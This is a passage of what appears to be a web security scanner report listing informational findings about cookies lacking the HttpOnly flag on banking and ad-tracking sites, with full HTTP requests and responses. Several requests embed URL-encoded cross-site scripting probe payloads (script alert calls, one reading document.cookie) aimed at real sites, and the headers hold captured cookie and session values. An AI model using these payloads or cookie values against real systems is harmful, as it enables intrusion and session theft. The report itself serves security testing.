Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

11.286. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=321886802;fpan=1;fpa=P0-629275191-1296696399668;ns=0;url=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa'%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more;ref=http%3A%2F%2Fburp%2Fshow%2F31;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296696399666;tzo=360;a=p-51dZx4IkAE4Zk HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EHUAG6ANq0itiBDbz6HJXbIAAbsBAfsFgZYAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMKwQz28g4QANEOECjRk_44OSDUKISBQA8m4QsYwrHXgwsaUbHhACoR8gIgAXKEglXoLBA7I4OxHhmiEA; expires=Wed, 04-May-2011 01:26:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 03 Feb 2011 01:26:00 GMT
Server: QS


11.287. http://promo.bankofamerica.com/paynow/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://promo.bankofamerica.com
Path:   /paynow/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paynow/ HTTP/1.1
Host: promo.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:18 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=2, max=34
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=44922ab53660;expires=Wed, 02-Feb-11 23:02:18 GMT;path=/
Content-Length: 12818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <m
...[SNIP]...

11.288. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=V_hBBoSZrvzxwVsylnKaXvamneyvQhRVH4dyk1q1DU-JwV9kSIzX4BtZ7vBDkFqiiL8UzCzja6AU_RwAB28KJ34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Mon, 01-Aug-2011 21:59:51 GMT; Path=/
Set-Cookie: pf=hSFS6V9RralO5TAZxGJeZvGg9PbDjU1MlxjW9dV5eZ5jqZuIRd8A-o0ExTc3vaWlxIIqXRYDrwUzWdU8FouvuX4lLZyvKs0UYrWi2iSsDx7sOdJSbm78n6rsprnZe1v22qBVdfNzg2_d8PpzIuVDet9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5MJ95PDohf8ilJApWZavAKvxeht3ivBnz3hwow8XaUE6U; Domain=.turn.com; Expires=Mon, 01-Aug-2011 21:59:51 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=971555&t=2
Content-Length: 0
Date: Wed, 02 Feb 2011 21:59:50 GMT


11.289. https://resources.cardmemberservices.com/MyAccounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://resources.cardmemberservices.com
Path:   /MyAccounts.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccounts.aspx HTTP/1.1
Host: resources.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 170
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://online.cardmemberservices.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2>
</body></html>

11.290. https://resources.chase.com/MyAccounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://resources.chase.com
Path:   /MyAccounts.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccounts.aspx HTTP/1.1
Host: resources.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 162
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://chaseonline.chase.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2>
</body></html>

11.291. http://s.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: s.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:21 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=AE-00000001269628442; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:21 GMT
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


11.292. https://s.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: s.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:22 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=AD-00000000147665198; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:22 GMT
Location: https://s.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


11.293. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.aol.com
Path:   /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Thu, 03 Feb 2011 01:04:49 GMT
Set-Cookie: clickstreamid=8948779409229799389
Set-Cookie: TBS=prod:1296695089975:0; Domain=search.aol.com; Path=/
Set-Cookie: s_guid=b74a84bae87f4f149feb5368d76e17a7:020211; Domain=search.aol.com; Expires=Fri, 02-Mar-2012 01:04:49 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 1070
Keep-Alive: timeout=5, max=961
Connection: Keep-Alive

<html><head><title>Apache Tomcat/5.5.27 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

11.294. https://shop.aafes.com/shop/ECC/Account/OlApp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.aafes.com
Path:   /shop/ECC/Account/OlApp.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/ECC/Account/OlApp.aspx HTTP/1.1
Host: shop.aafes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: AAFES=R1966950070; path=/
Connection: close
Date: Thu, 03 Feb 2011 01:04:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx
Set-Cookie: ASP.NET_SessionId=2n4tod55edqnia45xomyrlzq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 216

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx">here</a>.</h2>

...[SNIP]...

11.295. http://sofa.bankofamerica.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?tid=1&ci=90010394&vn2=e4.0&st=1296684336309&vn1=4.2.7.1BOA&ec=utf-8&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTP-PageNotFound&cg=AboutBAC%3AHelp%3APageNotFound&rnd=1296688180794&ul=http%3A//www.bankofamerica.com/findit/error.cgi&pv11=%7C000302027g850000c336%7C&rf=http%3A//www.bankofamerica.com/vehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E45ae18a6011/index.cfm&cvdone=p&cck= HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; CoreID6=30041296684284122624552; TestSess3=30041296684284122624552

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:04:44 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90010394_login=1296684284015106151490010394; path=/
Set-Cookie: 90010394_reset=1296684284;path=/
Expires: Wed, 02 Feb 2011 04:04:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

11.296. http://sofa.bankofamerica.com/eluminate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?tid=1&ci=90010394&vn2=e4.0&st=1296696506821&vn1=4.2.7.1BOA&ec=utf-8&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTP-PageNotFound&cg=AboutBAC%3AHelp%3APageNotFound&rnd=1296705605571&ul=http%3A//www.bankofamerica.com/findit/error.cgi&pv11=%7C000302027g850000c336%7C&rf=http%3A//www.bankofamerica.com/deposits/checksave491c6%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E20cb5e334dd/index.cfm HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; CoreID6=30041296684284122624552; TestSess3=30041296684284122624552; 90010394_login=1296684284015106151490010394; 90010394_reset=1296686135; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:27:50 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90010394_login=1296696470001684378690010394; path=/
Set-Cookie: 90010394_reset=1296696470;path=/
Expires: Wed, 02 Feb 2011 07:27:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

11.297. http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif?&dcsdat=1296684059906&dcssip=www.citizensbank.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Citizens%20Bank:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Citizens%20Bank&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=2f09a5fcfe32cca7b8b1296687659993.1296684059993&WT.co_f=2f09a5fcfe32cca7b8b1296687659993&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.citizensbank.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAFAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADY00lN2NNJTQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Wed, 02 Feb 2011 22:00:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
